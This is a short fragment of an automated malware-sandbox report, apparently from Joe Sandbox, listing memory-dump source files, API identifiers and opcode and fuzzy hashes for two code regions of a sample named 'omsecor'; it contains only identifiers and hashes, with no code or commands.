                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                          • String ID:
                          • API String ID: 3604167287-0
                          • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                          • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: -
                          • API String ID: 885266447-2547889144
                          • Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                          • Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE